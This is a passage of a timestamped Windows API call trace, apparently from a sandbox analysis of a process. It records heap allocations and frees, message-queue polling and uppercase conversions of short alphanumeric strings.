RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0165.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0165.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0165.862] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.862] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.864] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.864] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.865] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.865] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.865] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.866] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.866] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.866] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.866] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0165.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.866] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.867] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.867] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.867] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.868] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, 